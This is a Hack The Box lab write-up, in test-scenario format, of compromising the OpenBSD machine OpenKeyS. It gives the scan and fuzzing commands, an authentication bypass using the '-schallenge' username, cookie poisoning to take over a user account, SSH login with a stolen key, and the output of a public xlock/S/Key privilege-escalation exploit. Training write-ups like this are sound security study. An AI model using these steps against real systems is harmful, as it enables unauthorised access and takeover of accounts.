## Version 2.0
## language: en

Feature: openkeys - machine lab - hack the box
  Code:
    openkeys
  Site:
    https://hackthebox.eu
  Category:
    machine lab
  User:
    Fuego
  Goal:
    Find the user flag and the root flag

  Background:
  Hacker's software:
    | <Software name>      | <Version>   |
    | kali linux           | 2020.2      |
    | Firefox ESR          | 60.10.0esr  |
    | nmap                 | 7.80        |
    | wfuzz                | 2.4.5       |
    | dotdotpwn            | 3.0.2       |
    | Cookie Quick Manager | 0.5rc2      |
  Machine information:
    Given I am accessing the OpenKeyS machine (10.10.10.199) through a VPN
    And and enter a basic blog site with a login form
    And is running on OpenBSD

  Scenario: Success:Information Gathering
    Given I run the following nmap command
    """
    $ nmap -sV -sC -Pn -T4 -v -p- --min-rate=10000 10.10.10.199
    """
    Then I get the output
    """
    22/tcp open  ssh     OpenSSH 8.1 (protocol 2.0)
    | ssh-hostkey:
    |   3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
    |   256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
    |_  256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
    80/tcp open  http    OpenBSD httpd
    | http-methods:
    |_  Supported Methods: GET HEAD
    |_http-title: Site doesn't have a title (text/html).
    """
    Then I can see a port 22 using ssh
    And a port 80 using HTTP

  Scenario: Success:Enumerate directories
    Given I know the port 80 is http
    And there is a webapp running
    When I run the next command
    """
    $ wfuzz -u 10.10.10.199/FUZZ -w /usr/share/seclists/Discovery/
    Web-Content/directory-list-2.3-medium.txt --hc 404
    """
    And I get the output
    """
    ===================================================================
    ID           Response   Lines    Word     Chars       Payload
    ===================================================================

    000000016:   301        17 L     48 W     443 Ch      "images"
    000000550:   301        17 L     48 W     443 Ch      "css"
    000000638:   301        17 L     48 W     443 Ch      "includes"
    000000953:   301        17 L     48 W     443 Ch      "js"
    000001481:   301        17 L     48 W     443 Ch      "vendor"
    000002771:   301        17 L     48 W     443 Ch      "fonts"
    000004530:   404        17 L     48 W     427 Ch      "praca"
    """
    Then I check the directories open them in the firefox ESR browser
    And in the '/includes' directory I found a file called 'auth.php.swp'

  Scenario: Fail: Traversal Path Attack (TPA)
    Given I want to test if the system is vulnerable to Traversal Path Attack
    And the server is running a webapp on port 80 and HTTP service
    When I use the dotdotpwn tool against it with the command
    """
    $ dotdotpwn -m http -h 10.10.10.199
    """
    And I get a lot of paths that dont exists with a lot of false positives.
    Then I manually tested it, but it didn't seem vulnerable to TPA

  Scenario: Success:Find a user name
    Given I Found a file 'auth.php.swp' in the '/includes' directory
    When I open the 'auth.php.swp' file
    Then I found the user name 'jennifer'
    And I see a path into the function 'escapeshellcmd' the path is
    """
    ../auth_helpers/check_auth
    """
    Then I open it into the browser to download it,
    And the interesting thing about the file is its name 'check_auth'

  Scenario: Success:Find an exploit to log in
    Given I know the username 'jennifer', the operating system openbsd
    And an authentication file called 'check_auth'
    Then I use a search engine to look for them
    And combining words like exploit or CVE finally found the webpage
    """
        https://nvd.nist.gov/vuln/detail/CVE-2019-19522
    """
    And inside I found these links
    """
    https://packetstormsecurity.com/files/155572/
    Qualys-Security-Advisory-OpenBSD-Authentication-Bypass-
    Privilege-Escalation.html

    https://seclists.org/fulldisclosure/2019/Dec/14

    https://www.openwall.com/lists/oss-security/2019/12/04/5

    https://seclists.org/bugtraq/2019/Dec/8

    https://www.openwall.com/lists/oss-security/2019/12/04/5

    """
    When reading them, I found this text
    """
    This is the second piece of the puzzle: if an attacker specifies the
    username "-schallenge" (or "-schallenge:passwd" to force a passwd-style
    authentication), then the authentication is automatically successful and
    therefore bypassed.
    """
    Then I know how to login, using any password with '-schallenge' user
    And I loggged in like '-schallenge' user getting its cookie

  Scenario: Success:client side cookie poisoning
    Given that I already have the '-schallenge' user cookie
    And a real user name 'jennifer'
    When I edit the cookie with Cookie Quick Manager Firefox Pluggin
    And I replace the cookie fields like this 'name=username' 'value=jennifer'
    Then I login again with username '-schallenge' and any password
    And get logged like 'jennifer' due to the client side cookie poisoning
    Then it shows me the jennifer's private ssh key
    And I copy/paste it on a file called 'jkey.ssh'

  Scenario: Success:getting user's flag
    Given I have the jennifer's ssh private key in a file called 'jkey.ssh'
    And there is a ssh service on port 22
    When I run the next command
    """
    $ ssh -i jkey.ssh jennifer@10.10.10.199
    """
    And I get a remote shell logged with the 'jennifer' user
    Then I look for the flag file that it is in '/home/jennifer'
    And use the command
    """
    cat user.txt
    """
    And I caught the user's flag

  Scenario: Success:Find a way to escalate privileges
    Given I am logged in like 'jennifer'
    And I found CVE-2019-19520 description on
    """
    https://seclists.org/fulldisclosure/2019/Dec/14

    ==========================================================================
    2. CVE-2019-19520: Local privilege escalation via xlock
    ==========================================================================

    On OpenBSD, /usr/X11R6/bin/xlock is installed by default and is
    set-group-ID "auth", not set-user-ID;
    """
    When I check the 'xlock' file group it is set to 'auth'
    Then it is susceptible to escalate privileges via 'xlock'

  Scenario: Success:Find an exploit to escalate privileges
    Given I know that OpenKeyS Machine is susceptible to CVE-2019-19520
    And I am logged like 'jennifer' on OpenKeyS machine
    When I search on exploit-db without find anything
    And search with google on github using the next query
    """
    site:github.com openbsd cve-2019-19520
    """
    Then I found this repository
    """
    https://github.com/bcoles/local-exploits/blob/
    master/CVE-2019-19520/openbsd-authroot
    """
    And I copy/paste the exploit on a file called exploit.sh

  Scenario: Success:Escalate privileges
    Given I am logged like a normal user 'jennifer' on the OpenKeyS machine
    And I give execution privileges to 'exploit.sh' with the command
    """
    $ chmod +x exploit.sh
    """
    When I excecute the exploit with the command
    """
    $ ./exploit.sh
    """
    And It prints the following output
    """
    ./exploit.sh[1]: penbsd-authroot: not found
    openbd-authroot (CVE-2019-19520 / CVE-2019-19522)
    [*] checking system ...
    [*] system supports S/Key authentication
    [*] id: uid:1001(jennifer) gid=100(jennifer)
    groups=1001(jennifer), 0(wheel)
    [*] compiling ...
    [*] running Xvfb ...
    [*] testing for CVE-2019-19520 ...
    _XSERVTransmkdir: ERROR: euid != 0,
    directory /tmp/.X11-unix will not be created.
    [+] success! we have auth group permissions

    WARNING: THIS EXPLOIT WILL DELETE KEYS.
    YOU HAVE 5 SECONDS TO CANCEL (CTRL+c).

    [*] trying CVE-2019-19522 (S/Key) ...
    Your password is: EGG LARD GROW HOG DRAG LAIN
    opt-md5 99 obsd91335
    S/Key Password:
    """
    Then in the output is the password 'EGG LARD GROW HOG DRAG LAIN'
    And I use the password to escalate and login like root
    Then in the root folder I use the command
    """
    $ cat root.txt
    """
    Then I caught the flag solving the challenge
